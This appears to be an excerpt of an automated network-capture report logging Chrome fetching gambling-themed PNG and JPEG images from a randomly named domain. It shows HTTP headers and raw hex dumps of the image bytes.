                                          2025-01-12 00:17:08 UTC6928INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 00 d8 50 4c 54 45 22 22 22 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 ff ff ff fb fb fb 1b 1b 1b 16 16 16 0e 0e 0e 29 29 29 f9 f9 f9 f7 f7 f7 be be be b7 b7 b7 34 34 34 af af af f2 f2 f2 46 46 46 2f 2f 2f 77 77 77 40 40 40 3b 3b 3b e9 e9 e9 db db db d6 d6 d6 cd cd cd e0 e0 e0 6b 6b 6b 86 86 86 6f 6f 6f 4b 4b 4b 9a 9a 9a 8b 8b 8b 73 73 73 5d 5d 5d c4 c4 c4 62 62 62 ed ed ed a3 a3 a3 e4 e4 e4 c8 c8 c8 b3 b3 b3 a7 a7 a7 d1 d1 d1 53 53 53 57 57 57 4f 4f 4f 80 80 80 7c 7c 7c 67 67 67 9e 9e 9e 90 90 90 94 94 94 06
                                          Data Ascii: PNGIHDR2PLTE""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""")))444FFF///www@@@;;;kkkoooKKKsss]]]bbbSSSWWWOOO|||ggg


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          90192.168.2.449843122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:07 UTC361OUTGET /imgs/sansanqiqi.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 9166
                                          Last-Modified: Tue, 15 Oct 2024 17:22:51 GMT
                                          Connection: close
                                          ETag: "670ea4eb-23ce"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC9166INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 23 80 49 44 41 54 78 9c ed 9d 7b 90 5d 47 79 e0 7f 5f df 3b 23 c9 f2 58 83 e5 87 46 c6 d6 d8 96 6d c0 18 0d 06 8c 03 0e 1e e2 0d 60 42 05 11 d8 5d 2a 0b 85 f3 60 49 51 11 71 76 ff 58 8a 4a 15 6c 52 b5 81 64 c3 ba 4a bc 6a 21 44 4b 42 42 fe 33 8f 80 81 80 c7 f8 09 76 e2 f1 fb 25 c3 48 b2 3d d6 c3 f6 48 a3 87 35 73 4f 7f fb 47 9f 3b 73 e7 ce bd e7 f4 e9 73 ee cc 48 ea 9f eb 58 23 9d 3e dd df 9c d3 5f 3f be fe fa 6b 51 55 22 91 48 67 cc 72 0b 10 89 ac 64 a2 82 44 22 19 44 05 89 44 32 88 0a 12 89 64 10 15 24 12 c9 20 2a 48 24 92 41 54 90 48 24 83 a8 20 91 48 06 51 41 22 91 0c a2 82 44 22 19 44
                                          Data Ascii: PNGIHDRXpHYs#IDATx{]Gy_;#XFm`B]*`IQqvXJlRdJj!DKBB3v%H=H5sOG;ssHX#>_?kQU"HgrdD"DD2d$ *H$ATH$ HQA"D"D


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          91192.168.2.449841122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:07 UTC612OUTGET /imgs/tychongse.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 21808
                                          Last-Modified: Fri, 04 Oct 2024 20:16:00 GMT
                                          Connection: close
                                          ETag: "67004d00-5530"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 b4 08 03 00 00 00 f5 b1 d3 e2 00 00 03 00 50 4c 54 45 00 00 00 a8 11 18 b7 1d 24 a7 10 17 dc 39 40 dc 39 40 ac 11 17 b7 1c 24 9a 07 11 a8 11 18 da 37 3d ba 1e 22 b5 18 1f 9f 08 10 a1 0b 13 e2 3c 44 cc 2d 36 cb 29 32 ce 30 37 a6 0b 0f d9 37 3f b3 14 1e e4 3f 46 b6 1c 22 aa 16 1e d7 35 3e e0 3a 42 b2 1c 22 bf 23 28 b2 15 19 d4 32 3c d5 31 38 e6 40 4a a9 0e 12 b0 13 15 aa 09 11 be 1f 24 b6 1b 1e db 38 41 c1 25 2d bc 21 29 a3 0a 0e b0 1b 1f c9 28 2e b5 21 24 ba 1f 26 a7 15 1c b9 1a 1f 9c 0a 11 ac 10 15 e7 41 48 c2 22 28 ae 17 1e d1 2e 36 b4 16 1b d1 32 3b ce 2d 34 c6 27 2e bb 22 23 a4 0a 13 b7 20 29 c6 29 32 d4 2e 35 d2 2f 39 b0 0f 19 c4 23 2c e8 42 4b c8 2d 31 be 28 2e a6 0f 12 dd 38 41 ce
                                          Data Ascii: PNGIHDRPLTE$9@9@$7="<D-6)2077??F"5>:B"#(2<18@J$8A%-!)(.!$&AH"(.62;-4'."# ))2.5/9#,BK-1(.8A
                                          2025-01-12 00:17:08 UTC5770INData Raw: 7e d5 a3 92 24 59 76 38 6c 3e c7 39 c1 60 79 03 19 fd 07 c0 6e 18 34 82 4b 83 92 85 d6 b5 1f 8e ab 71 35 5a 88 f3 6a a8 60 74 bb 2d ce 51 b3 71 27 08 a9 e7 12 bd 5c 30 98 eb 66 77 56 b6 79 d0 bd 20 0a 32 c9 c9 b2 58 5f 5e c9 1e d9 4a 04 4d e3 0b fe 9b 1c a2 35 b6 ab 69 4a bf 8c 14 8a 82 ef fd c5 3b 1e 93 0f f2 56 fa d3 d3 9f 3f 71 dc 52 10 b3 11 9b 0e 4c 4d 4f 3f 61 1b 72 0c 75 70 44 ab 63 bb 34 aa 6e 73 22 21 3f b5 85 0b f8 9d b2 f8 37 00 88 21 d3 c8 80 60 12 00 fe 45 30 b0 50 27 70 cc 18 2d 97 dd ae 3c 4c 0b f1 de e8 f2 7c 48 8d d7 52 06 2b ac 66 5e 57 16 94 c3 07 83 02 38 bd 74 a0 8a 64 53 12 09 0e 82 26 09 92 10 e1 49 d0 af 96 68 96 c5 b7 5d 11 28 4e 94 48 33 08 11 55 d0 3d 86 30 25 65 02 c7 47 08 8c b1 dc ab 56 ab 24 96 c4 72 95 c3 4a a5 d7 eb 5d 81
                                          Data Ascii: ~$Yv8l>9`yn4Kq5Zj`t-Qq'\0fwVy 2X_^JM5iJ;V?qRLMO?arupDc4ns"!?7!`E0P'p-<L|HR+f^W8tdS&Ih](NH3U=0%eGV$rJ]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          92192.168.2.449844122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:08 UTC614OUTGET /imgs/188jinbaobo.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 4303
                                          Last-Modified: Tue, 01 Oct 2024 15:31:11 GMT
                                          Connection: close
                                          ETag: "66fc15bf-10cf"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC4303INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 16 50 4c 54 45 00 00 00 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 59 ff 92 00 59 59 59 59 59 59 59 59 59 ff 92 00 59 59 59 ff 92 00 59 59 59 ff 92 00 59 59 59 59 59 59 ff 92 00 ff 92 00 59 59 59 ff 9d 23 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 92 00 ff 92 00 59 59 59 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff 92 00 ff 93 00 59 59 59 ff 92 00 59 59 59 ff 92 00 ff 92 00 ff
                                          Data Ascii: PNGIHDR2PLTEYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY#YYYYYYYYYYYYYYYYYYYYYYYYYYY


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          93192.168.2.449846122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:08 UTC608OUTGET /imgs/weide.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/css/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 5294
                                          Last-Modified: Fri, 04 Oct 2024 20:16:01 GMT
                                          Connection: close
                                          ETag: "67004d01-14ae"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC5294INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 01 83 50 4c 54 45 00 00 00 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 25 2c 33 26 2d 33 ff ff ff 26 2e 35 23 2a 32 25 2c 32 29 30 38 23 28 2f 19 20 29 1c 23 2b 2c 33 3a 1f 27 2f 15 1c 24 22 25 2c 5c cc f1 5c cd f5 7c 80 85 ed ee ee 38 3e 45 22 22 27 29 37 41 e0 e2 e3 b8 ba bd 42 7e 96 57 c0 e2 2c 3e 48 20 1c 21 2f 48 54 46 4c 52 6b 71 75 70 75 7a ce cf d1 4b 50 56 5d d0 f8 3b 6b 7e 3d 6c 80 61 67 6b 56 ba dd 5a c8 ee 58 c2 e7 32 4f 5d 5b ca f0 b2 b4 b8 5f d8 ff 5f d5 fd fa fa fa f5 f5 f6 10 18 1f 63 e2 ff 47 8f a9 c2 c5 c7 3d
                                          Data Ascii: PNGIHDR2PLTE&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5%,3&-3&.5#*2%,2)08#(/ )#+,3:'/$"%,\\|8>E""')7AB~W,>H !/HTFLRkqupuzKPV];k~=lagkVZX2O][__cG=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          94192.168.2.449845122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:08 UTC357OUTGET /imgs/bet365.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:08 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 11205
                                          Last-Modified: Tue, 01 Oct 2024 15:31:11 GMT
                                          Connection: close
                                          ETag: "66fc15bf-2bc5"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:08 UTC11205INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 01 d1 50 4c 54 45 15 81 5f 20 87 67 1c 84 63 19 83 61 24 89 69 25 89 6a 1a 84 62 ff ff ff 1e 86 65 1a 84 62 15 81 5e ff e0 21 ff e0 1d 18 82 61 22 88 68 18 82 60 0b 7c 58 ff e3 1e 11 7f 5b 0c 7e 62 14 81 63 f9 fd fb 0e 7f 65 ff e5 18 ff e9 1b 15 82 65 07 7b 64 11 7f 60 2a 8c 6d ff e6 1b 07 7b 68 ff e2 1a 06 79 54 ff e5 1e 02 79 65 cb e3 dc 48 9d 82 0d 7e 68 f2 f8 f6 ef db 21 1d 84 5e 23 87 5d da eb e6 6e a5 46 42 93 54 ed f6 f3 f7 e0 20 ff ea 15 4b 9e 84 a8 d0 c3 ff e7 16 3f 98 7c 35 92 75 01 77 66 ad d3 c7 24 87 60 d3 d0 28 11 7f 62 e4 d8 24 01 75 50 6a af 99 02 79 6a f3 de 20 dc d3 27 9f cb be 36 8e 59 4b 97 52 83 ae 42 75 a8 47 e7 f3 ef 3b 95 78 97
                                          Data Ascii: PNGIHDR2PLTE_ gca$i%jbeb^!a"h`|X[~bcee{d`*m{hyTyeH~h!^#]nFBT K?|5uwf$`(b$uPjyj '6YKRBuG;x


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          95192.168.2.449847122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:08 UTC355OUTGET /imgs/wlxe.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 5313
                                          Last-Modified: Fri, 04 Oct 2024 20:16:01 GMT
                                          Connection: close
                                          ETag: "67004d01-14c1"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC5313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 55 50 4c 54 45 00 00 00 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a 06 0a 2a ff ff ff 00 00 19 00 00 10 03 07 28 00 00 14 00 01 21 00 00 16 00 00 1e 06 0b 2c 91 84 6f cd b8 8d 00 02 24 01 05 27 00 00 0c 04 08 2b b6 b7 c0 00 00 01 00 00 07 94 96 a4 ff f5 ab 13 16 33 0d 10 2e ff ff b6 1a 1a 2f ff f1 aa 55 4f 4e ff ec a6 8c 80 6b ff fc b0 f1 f1 f3 23 21 33 ff ea a1 ef d5 96 85 87 96 e8 cf 93 cb b6 8b 3f 42 5b 3e 41 5a 12 11 28 ff ff b2 4a 44 48 ff ff bc e3 cb 90 c6 b3 88 f9 e0 a0 9a 8c 71 1c 1d 35 dc
                                          Data Ascii: PNGIHDR2UPLTE***********************(!,o$'+3./UONk#!3?B[>AZ(JDHq5


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          96192.168.2.449848122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:08 UTC599OUTGET /imgs/2025fajia.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:08 GMT
                                          Content-Type: image/png
                                          Content-Length: 32644
                                          Last-Modified: Tue, 01 Oct 2024 17:57:38 GMT
                                          Connection: close
                                          ETag: "66fc3812-7f84"
                                          Expires: Tue, 11 Feb 2025 00:17:08 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 f4 00 00 08 cb 08 03 00 00 00 b5 87 ca 90 00 00 00 84 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc aa 6e b0 00 00 00 2b 74 52 4e 53 00 32 5f e0 43 8d b1 10 f9 85 54 9a 4e 05 0a 70 ef 1a c3 d4 67 cd aa a4 bc 21 77 f4 93 ea 48 38 3d e5 2b 7f 26 14 da 58 c9 b7 7a 8f 1d 2f 83 00 00 7e 84 49 44 41 54 78 da ec c1 81 00 00 00 00 80 a0 fd a9 17 a9
                                          Data Ascii: PNGIHDRPLTEn+tRNS2_CTNpg!wH8=+&Xz/~IDATx
                                          2025-01-12 00:17:09 UTC16384INData Raw: 58 6c 82 bb a7 60 3d bd 7a 19 07 a7 5d 30 5b 5e 75 27 c1 7d 3f 78 eb 04 c7 ed d5 7c 18 08 19 d0 0a dd 73 ef d0 34 f9 cf 3d 37 b7 7a df 58 dd d8 fc 90 8a 68 30 8e 76 d1 32 ea 4e a2 7e d4 89 b6 7a 01 f0 9f 3c 0c 2f b6 37 86 65 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e d9 83 03 01 00 00 00 00 20 ff d7 46 50 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 15 f6 e0 40 00 00 00 00 00 c8 ff b5 11 54 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 85 3d 38
                                          Data Ascii: Xl`=z]0[^u'}?x|s4=7zXh0v2N~z</7eT> FPUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU@TUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU=8
                                          2025-01-12 00:17:09 UTC222INData Raw: 00 00 7c 65 0f 0e 04 00 00 00 00 80 fc 5f 1b 41 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 d8 83 03 01 00 00 00 00 20 ff d7 46 50 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 95 f6 e0 90 00 00 00 00 40 d0 ff d7 6e b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 12 a5 b2 8e 82 97 89 8c db 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: |e_AUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU FPUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU@nIENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          97192.168.2.449849122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:08 UTC359OUTGET /imgs/bg.lanse.jpg HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:09 UTC349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:09 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 296412
                                          Last-Modified: Mon, 07 Oct 2024 16:04:16 GMT
                                          Connection: close
                                          ETag: "67040680-485dc"
                                          Expires: Tue, 11 Feb 2025 00:17:09 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:09 UTC16035INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 09 06 07 08 07 06 09 08 08 08 0a 0a 09 0b 0e 17 0f 0e 0d 0d 0e 1c 14 15 11 17 22 1e 23 23 21 1e 20 20 25 2a 35 2d 25 27 32 28 20 20 2e 3f 2f 32 37 39 3c 3c 3c 24 2d 42 46 41 3a 46 35 3b 3c 39 ff db 00 43 01 0a 0a 0a 0e 0c 0e 1b 0f 0f 1b 39 26 20 26 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 ff c2 00 11 08 05 78 0e 09 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 87 d1 c0 00 05 40
                                          Data Ascii: JFIFC"##! %*5-%'2( .?/279<<<$-BFA:F5;<9C9& &99999999999999999999999999999999999999999999999999x@
                                          2025-01-12 00:17:09 UTC16384INData Raw: ac 50 24 90 09 20 00 01 24 02 48 26 8a 00 00 42 00 05 6d 19 d6 65 53 a6 5b c8 00 00 00 00 16 50 a0 85 00 02 04 90 09 20 10 09 a8 8b 10 41 24 c4 54 15 a8 20 d4 00 04 41 60 00 00 16 94 45 9c 19 de 42 21 7b 13 a3 78 88 83 8a 6e 92 d0 84 a9 0a 22 21 62 05 40 9a b4 6b ac d6 c9 b2 c4 ca 96 75 2c 5c b9 d1 9b f3 b2 c1 d3 66 e5 48 28 50 d4 dc d0 d8 b0 20 89 60 16 22 ca 46 6b 73 9e ca 99 cb 04 d9 a1 4a d2 2e 6b 1a 2e a6 85 ea 23 03 32 e6 da ce a6 99 d7 8b 2f 36 77 a5 cd 8d 2b 6b 2c 96 35 34 ab 5c cd 44 58 8a 83 3b 96 b2 04 13 51 12 40 33 ce a6 b6 4b 00 05 55 00 00 58 00 00 24 80 00 05 40 0b 5a 15 99 95 90 44 b6 2a 49 60 44 4a c5 95 52 4c b2 45 91 2d 6c aa eb 16 ab e7 40 0e 64 d0 b2 f3 9b 94 20 b4 6b 2d 2c f3 35 0b a2 66 6a 63 9b e9 e7 54 97 c0 c6 f8 f1 bf c9 fa f3
                                          Data Ascii: P$ $H&BmeS[P A$T A`EB!{xn"!b@ku,\fH(P `"FksJ.k.#2/6w+k,54\DX;Q@3KUX$@ZD*I`DJRLE-l@d k-,5fjcT
